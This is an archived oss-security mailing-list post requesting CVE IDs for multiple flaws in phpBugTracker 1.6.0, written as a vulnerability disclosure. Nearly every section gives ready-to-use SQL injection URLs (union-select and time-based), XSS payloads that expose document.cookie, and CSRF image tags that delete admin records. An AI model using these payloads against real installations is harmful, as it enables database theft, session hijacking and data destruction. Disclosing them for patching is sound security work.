Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Sat, 21 Feb 2015 13:32:20 +0100
From: Steffen Rösemann <steffen.roesemann1986@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE-Request -- phpBugTracker v. 1.6.0 -- Multiple SQLi,
 stored/reflecting XSS- and CSRF-vulnerabilities

Hi Steve, Josh, vendors, list.

I found multiple SQLI-, stored/reflecting XSS- and CSRF-vulnerabilities in
Issuetracker phpBugTracker v. 1.6.0.

The following files used in a common phpBugTracker installation suffer from
different SQLi-, stored/reflected XSS- and CSRF-vulnerabilities:

===========
project.php
===========

SQL injection / underlaying CSRF vulnerability  in project.php via id
parameter:

http://
{TARGET}/admin/project.php?op=edit_component&id=1%27+and+1=2+union+select+1,2,database%28%29,user%28%29,5,6,version%28%29,8,9,10,11,12+--+

Stored XSS via input field "project name":

http://{TARGET}/admin/project.php?op=add

executed in: e.g. http://{TARGET}/admin/project.php, http://
{TARGET}/index.php


========
user.php
========

Reflecting XSS in user.php via use_js parameter:

http://
{TARGET}/admin/user.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&user_id=1

executed in: same page


=========
group.php
=========

Reflecting XSS in group.php via use_js parameter:

http://
{TARGET}/admin/group.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&group_id=1

executed in: same page

(Blind) SQL Injection / underlaying CSRF vulnerability  in group.php via
group_id parameter (used in different operations):

http://
{TARGET}/admin/group.php?op=edit&use_js=1&group_id=1+and+SLEEP%2810%29+--+
http://
{TARGET}/admin/group.php?op=edit-role&use_js=1&group_id=8+and+substring%28version%28%29,1,1%29=5+--+


==========
status.php
==========

SQL injection / underlaying CSRF vulnerability  in status.php via status_id
parameter:

http://
{TARGET}/admin/status.php?op=edit&status_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+

Stored XSS via input field "Description":

http://{TARGET}/admin/status.php?op=edit&use_js=1&status_id=0

executed in: e.g. http://{TARGET}/admin/status.php

CSRF vulnerability in status.php (delete statuses):

<img src="http://{TARGET}/admin/status.php?op=del&status_id={NUMERIC_STATUS_ID}"
>


==============
resolution.php
==============

SQL injection / underlaying CSRF vulnerability  in resolution.php via
resolution_id parameter:

http://
{TARGET}/admin/resolution.php?op=edit&resolution_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+

CSRF vulnerability in resolution.php (delete resolutions):

<img src="http://{TARGET}/admin/resolution.php?op=del&resolution_id={NUMERIC_RESOLUTION_ID}"
>


============
severity.php
============

SQL injection / underlaying CSRF vulnerability  in severity.php via
severity_id parameter:

http://
{TARGET}/admin/severity.php?op=edit&severity_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+

CSRF vulnerability in severity.php (delete severities):

<img src="http://{TARGET}/admin/severity.php?op=del&severity_id={NUMERIC_SEVERITY_ID}"
>

Stored XSS in severity.php via input field "Description":

http://{TARGET}/admin/severity.php?op=edit&use_js=1&severity_id=0

executed in: e.g. http://{TARGET}/admin/severity.php


============
priority.php
============

SQL injection / underlaying CSRF vulnerability in priority.php via
priority_id parameter:

http://
{TARGET}/admin/priority.php?op=edit&priority_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,4,version%28%29+--+


======
os.php
======

SQL Injection / underlaying CSRF vulnerability in os.php via os_id
parameter:

http://
{TARGET}/admin/os.php?op=edit&os_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+

CSRF vulnerability in os.php (delete operating systems):

<img src="http://{TARGET}/admin/os.php?op=del&os_id={NUMERIC_OS_ID}" >

Stored XSS vulnerability in os.php via input field "Regex":

http://{TARGET}/admin/os.php?op=edit&use_js=1&os_id=0

executed in: e.g. http://{TARGET}/admin/os.php?


============
database.php
============

SQL injection / underlaying CSRF vulnerability in database.php via
database_id:

http://
{TARGET}/admin/database.php?op=edit&database_id=1%27+and+1=2+union+select+1,user%28%29,version%28%29+--+

CSRF vulnerability in database.php (delete databases):

<img src="http://{TARGET}/admin/database.php?op=del&database_id={NUMERIC_DATABASE_ID}"
>

Stored XSS vulnerability in database.php via input field "Name":

http://{TARGET}/admin/database.php?op=edit&use_js=1&database_id=0


========
site.php
========

CSRF vulnerability in site.php (delete sites):

<img src="http://{TARGET}/admin/site.php?op=del&site_id={NUMERIC_SITE_ID}" >

SQL injection / underlaying CSRF vulnerability in site.php via site_id
parameter:

http://
{TARGET}/admin/site.php?op=edit&site_id=5%27+and+1=2+union+select+1,version%28%29,database%28%29+--+

Can I have a CVE-ID/CVE-IDs for the issues, please?

Thank you very much!

Greetings from Germany.

Steffen Rösemann

References:

[1] https://github.com/a-v-k/phpBugTracker
[2] http://sroesemann.blogspot.de/2015/02/sroeadv-2015-16.html
[3] https://github.com/a-v-k/phpBugTracker/issues/4
[4] https://github.com/sroesemann/phpBugTracker
[5] http://seclists.org/fulldisclosure/2015/Feb/83

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ